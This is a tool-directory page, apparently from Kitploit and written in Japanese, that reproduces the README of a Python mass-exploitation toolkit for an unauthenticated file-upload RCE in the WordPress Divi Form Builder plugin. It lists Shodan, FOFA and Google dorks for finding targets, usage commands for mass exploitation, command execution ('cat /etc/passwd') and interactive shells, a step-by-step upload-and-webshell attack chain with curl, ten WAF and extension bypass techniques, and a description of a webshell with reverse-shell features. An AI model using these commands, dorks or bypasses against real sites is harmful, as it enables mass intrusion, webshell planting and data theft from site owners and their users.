Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5524-PoC — CVE-2026-5524(WordPress Divi Form Builder プラグインにおける認証不要のファイルアップロード RCE)向けの Python 大量エクスプロイトツールキット。ウェブシェルのアップロードとコマンド実行が可能。 | Kitploit
ツール/GitHubGitHub/iicaicai/cve-2026-5524-poc
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集WAFバイパスウェブセキュリティペネトレーションテストレッドチーミングペイロード開発リモートアクセストロイの木馬
253ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

CVE-2026-5524(WordPress Divi Form Builder プラグインにおける認証不要のファイルアップロード RCE)向けの Python 大量エクスプロイトツールキット。ウェブシェルのアップロードとコマンド実行が可能。

リポジトリを見る

CVE-2026-5524 — Divi Form Builder 未認証RCE

CVE-2026-5524 のための大量エクスプロイトツールキット。WordPressプラグイン Divi Form Builder <= 5.1.8 における未認証の任意ファイルアップロード脆弱性で、リモートコード実行に至ります。

version Devon Aji python telegram

項目値
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響を受けるバージョンDivi Form Builder <= 5.1.8
修正済み5.1.9
種類未認証ファイルアップロードによるRCE
研究者0xd4rk5id3 - EnvoraSec

目次

  • 概要
  • Dorks
  • インストール
  • 使用方法
    • 単一ターゲット
    • 大量エクスプロイト
    • 高度なバイパス
    • コマンド実行
  • 脆弱性の詳細
  • バイパス手法
  • 技術スタック
  • プロジェクト構成
  • 攻撃フロー
  • 免責事項

概要

WordPress用のDivi Form Builderプラグインには、未認証の任意ファイルアップロード脆弱性が存在します。do_image_upload() ハンドラは、ユーザーが制御可能な acceptFileTypes POSTパラメータを、ファイル拡張子を検証するために使用される正規表現に直接渡します。phtml などの値を指定することで、攻撃者は .php 拡張子のみをブロックするプラグインの .htaccess ルールをバイパスし、PHPで実行可能な拡張子(.phtml、.phar、.php5、.php7 など)を持つウェブシェルをアップロードできます。

ファイルが /wp-content/uploads/de_fb_uploads/ に配置されると、ApacheはそれをPHPとして実行し、攻撃者にWebサーバーユーザーとしてのリモートコード実行を許可します。

この問題はDivi Form Builder 5.1.9で修正されています。


Dorks

FOFA

body="de_fb_obj" && body="fb_nonce"

Shodan

http.html:"de_fb_obj" http.html:"fb_nonce"

Google

inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

app:"WordPress" && body:"de_fb_obj"

Censys

services.http.response.body: "de_fb_obj"

インストール

要件: Linux、macOS、またはWSL上のPython 3.8以降。

git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

使用方法

単一ターゲット

python3 CVE-2026-5524.py -u https://target.com

大量エクスプロイト

python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

高度なバイパス

WAF(NinjaFirewall、Wordfence、ModSecurity)の背後にあるターゲット、またはApacheやnginxの設定が強化されている場合。

python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

コマンド実行

アップロードが成功した後、スクリプトは即座にコマンドを実行するか、対話型シェルに入ることができます。

python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

フラグ

フラグ説明
-u URL単一ターゲットURL
-l FILEターゲットリストを含むファイル、1行に1つのURL
-t N同時スレッド数(デフォルト10)
--timeout Nリクエストタイムアウト(秒単位、デフォルト15)
-o FILE結果をJSONL出力ファイルに保存
--proxy URLHTTPプロキシ経由でトラフィックをルーティング
--nonce HASH手動で提供されたnonceを使用し、自動検出をスキップ
--ext EXT完全なバイパスリストの代わりに単一の拡張子を強制
--shell成功時に対話型RCEシェルに入る(単一ターゲットのみ)
--cmd CMDターゲット上で1つのコマンドを実行して終了
--shell-file FILE組み込みのものではなくカスタムシェルペイロードをアップロード
--no-verifyアップロード後のRCE検証ステップをスキップ
--strict-verifyシェルURLがHTTP 200を返すことを確認して誤検知を除外
--user-iniPHP-FPM環境用に .user.ini ドロッパーをアップロード
--htaccessApache環境用に .htaccess 再有効化ツールをアップロード
--aggressive利用可能なすべてのバイパス手法を有効化
--null-byteヌルバイトおよび二重拡張子の試行を含める
--path-traversal/uploads/YYYY/MM/ サブディレクトリへのアップロードを試行
--debug診断用に生のHTTPレスポンスを出力

脆弱性の詳細

脆弱なコード

脆弱なハンドラは、サニタイズせずにユーザー入力から正規表現を構築します。

public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

acceptFileTypes=phtml を送信することで、結果として得られる正規表現 /\.(phtml)$/i は .phtml で終わるファイル名にマッチします。これはプラグイン自身の .htaccess ファイルが .php 拡張子のみをブロックしているにもかかわらずです。その後ApacheはアップロードされたファイルをPHPとして実行し、リモートコード実行を引き起こします。

確認された攻撃チェーン

  1. Divi Form Builderフォームを埋め込んでいるページ(/、/contact、/quote など)をクロールします。?nocache=<random> パラメータを追加して、Varnish、WP Rocket、その他古いnonceを配信するページキャッシュを無効化します。

  2. ローカライズされたJavaScriptオブジェクトから fb_nonce の値を抽出します:

    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. /wp-admin/admin-ajax.php にマルチパートフォームをPOSTします:

    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. JSONレスポンスからファイルURLを読み取ります:

    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. base64エンコードされたコマンドでシェルをリクエストします:

    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

バイパス手法

#手法対象
1代替PHP拡張子 .phtml、.phar、.php5、.php7、.php4、.pht、.shtml.php のみをブロックするプラグインの .htaccess ルール
2大文字小文字の変更 .PHTML、.PHP5、.PhTmL大文字小文字を区別するWAFシグネチャ(NinjaFirewall)
3二重拡張子 .phtml.jpg、.php.jpgApache mod_mime のコンテンツネゴシエーションの癖
4ヌルバイト .php%00.jpg、.phtml%00.txt古いPHPバージョン(5.3.4未満)および特定のパーサー
5末尾のスペースまたはドット .php 、.php.Windows IISおよび古いApacheバージョン
6Content-Typeスプーフィング application/octet-streamマルチパートのContent-Typeヘッダーに依存するWAF
7.gif、.png、.jpg、.txt、.html などに対してPHPを再有効化する本物の .htaccess をアップロードAllowOverride All が設定されたApacheサーバー
8auto_prepend_file を含む .user.ini をアップロードPHP-FPM環境
9マルチパート境界操作によるファイル名インジェクションリクエストボディを再解析するプロキシおよびWAF
10ファイル名におけるパストラバーサル ../shell.phtmlプラグインのディレクトリ制限

スクリプトは各手法を優先順位に従って試行し、--aggressive が設定されている場合は、最初のアップロードが成功を報告した後でもすべてを試行します。


技術スタック

エクスプロイトスクリプト

コンポーネント技術
言語Python 3.8+
HTTPクライアントrequests
TLS処理自己署名証明書用に非セキュアモードの urllib3
並行処理大量スキャン用の concurrent.futures.ThreadPoolExecutor
パースnonce抽出用の re、レスポンス処理用の json
エンコードウェブシェルコマンドパラメータ用の base64
CLI19個の設定可能なフラグを持つ argparse

カスタムシェル (bypass.phtml)

コンポーネント技術
言語PHP 7.0+
実行関数system()、shell_exec()、proc_open()、passthru()、popen()
フロントエンドプレーンHTMLフォーム、JavaScriptフレームワークなし
機能ファイルブラウザ、コマンド実行、データベースアクセス、リバースシェル、自己インストールする .htaccess および .user.ini
サイズ約16 KB
バイパス層6つの独立した実行パスとエンコードされたペイロード

プロジェクト構成

cve-2026-5524/
|-- CVE-2026-5524.py          メインエクスプロイトスクリプト
|-- bypass.phtml              16 KBの多層PHPウェブシェル
|-- htaccess_enable.phtml     再有効化する.htaccessを書き込むドロッパー
|-- user_ini.phtml            PHP-FPM用の.user.iniを書き込むドロッパー
|-- targets.txt               ターゲットリストの例
|-- pwned.jsonl               大量スキャン中に-oフラグによって生成される
|-- requirements.txt          Python依存関係
`-- README.md                 このドキュメント

攻撃フロー

ツールをダウンロード